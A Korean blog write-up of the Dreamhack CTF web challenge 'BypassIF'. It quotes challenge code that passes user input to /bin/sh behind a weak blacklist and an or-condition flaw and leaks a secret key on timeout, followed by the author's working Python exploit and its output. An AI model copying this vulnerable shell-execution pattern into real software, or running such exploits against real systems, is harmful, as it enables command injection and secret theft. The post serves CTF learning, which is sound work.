상세 컨텐츠

본문 제목

[Dreamhack] BypassIF (WEB)

WEB HACKING/Dreamhack

by koharin 2025. 5. 12. 17:59

본문

728x90
반응형
def filter_cmd(cmd):
    alphabet = list(string.ascii_lowercase)
    alphabet.extend([' '])
    num = '0123456789'
    alphabet.extend(num)
    command_list = ['flag','cat','chmod','head','tail','less','awk','more','grep']

...

@app.route('/flag', methods=['POST'])
def flag():
     # POST request
    if request.method == 'POST':
        key = request.form.get('key', '')
        cmd = request.form.get('cmd_input', '')
        if cmd == '' and key == KEY:
            return render_template('flag.html', txt=FLAG)
        elif cmd == '' and key == guest_key:
            return render_template('guest.html', txt=f"guest key: {guest_key}")
        if cmd != '' or key == KEY:
            if not filter_cmd(cmd):
                try:
                    output = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
                    return render_template('flag.html', txt=output.decode('utf-8'))
                except subprocess.TimeoutExpired:
                    return render_template('flag.html', txt=f'Timeout! Your key: {KEY}')
                except subprocess.CalledProcessError:
                    return render_template('flag.html', txt="Error!")
            return render_template('flag.html')
        else:
            return redirect('/')
    else: 
        return render_template('flag.html')

코드를 보면 cmd !='' 또는 key == KEY이면 cmd를 실행해준다. 이때 key를 몰라도 or이기 때문에 cmd가 empty string만 아니면 된다.

이때 cmd로 sleep을 주면 timeout이 트리거되어 KEY를 구할 수 있다. (sleep은 블랙리스트에 없음)

이후 cmd == '' 그리고 key == KEY 조건을 통해 flag를 출력할 수 있다. 

 

 

import requests
import sys
import hashlib

chall_url="http://host8.dreamhack.games:14004/flag"

data = { "cmd_input": "sleep 10" } # trigger cmd != '' or key == KEY
# trigger timeout = 5
res = requests.post(chall_url, data=data)
print(res.text)
encoded_flag = res.text.split('<pre>Timeout! Your key: ')[1].split('</pre>')[0]
print(encoded_flag)
data = { "key" : encoded_flag }

res = requests.post(chall_url, data=data)
print(res.text)
$ python3 ex.py
<!doctype html>
<html>
  <head>
    <link rel="stylesheet" href="/static/css/bootstrap.min.css">
    <link rel="stylesheet" href="/static/css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="/static/css/non-responsive.css">
    <title>Flag | Dreamhack </title>



  </head>
<body>
      <!-- Fixed navbar -->
      <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
          <div class="navbar-header">
            <a class="navbar-brand" href="/">BypassIF</a>
          </div>
          <div id="navbar">
            <ul class="nav navbar-nav">
              <li><a href="/">index page</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </nav><br/><br/><br/>
    <div class="container">

<h1>hello admin</h1>
<form action="/flag" method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <br/><input type="text" class="form-control" placeholder="ls" name="cmd_input" required>
    </div>
  </div>
  <button type="submit" class="btn btn-default">Submit</button>
</form>
<br/><br/>

  <pre>Timeout! Your key: 409ac0d96943d3da52f176ae9ff2b974</pre>


    </div> <!-- /container -->

    <!-- Bootstrap core JavaScript -->
    <script src="/static/js/jquery.min.js"></script>
    <script src="/static/js/bootstrap.min.js"></script>
</body>
</html>
409ac0d96943d3da52f176ae9ff2b974
<!doctype html>
<html>
  <head>
    <link rel="stylesheet" href="/static/css/bootstrap.min.css">
    <link rel="stylesheet" href="/static/css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="/static/css/non-responsive.css">
    <title>Flag | Dreamhack </title>



  </head>
<body>
      <!-- Fixed navbar -->
      <nav class="navbar navbar-default navbar-fixed-top">
        <div class="container">
          <div class="navbar-header">
            <a class="navbar-brand" href="/">BypassIF</a>
          </div>
          <div id="navbar">
            <ul class="nav navbar-nav">
              <li><a href="/">index page</a></li>
            </ul>
          </div><!--/.nav-collapse -->
        </div>
      </nav><br/><br/><br/>
    <div class="container">

<h1>hello admin</h1>
<form action="/flag" method="POST">
  <div class="row">
    <div class="col-md-6 form-group">
      <br/><input type="text" class="form-control" placeholder="ls" name="cmd_input" required>
    </div>
  </div>
  <button type="submit" class="btn btn-default">Submit</button>
</form>
<br/><br/>

  <pre>DH{}</pre>


    </div> <!-- /container -->

    <!-- Bootstrap core JavaScript -->
    <script src="/static/js/jquery.min.js"></script>
    <script src="/static/js/bootstrap.min.js"></script>
</body>
</html>

 

728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'WEB HACKING > Dreamhack' 카테고리의 다른 글

[Dreamhack] Test Your Luck (WEB)  (2) 2025.07.24
[Dreamhack] Hangul - Revenge (WEB)  (0) 2025.04.29
[Dreamhack] web-ssrf (WEB)  (0) 2025.04.17
[Dreamhack] csrf-2 (WEB)  (0) 2025.04.17
Dreamhack CTF Season 7 Round #7 (🚩Div1) Pybrid write up  (0) 2025.04.07

관련글 더보기

티스토리툴바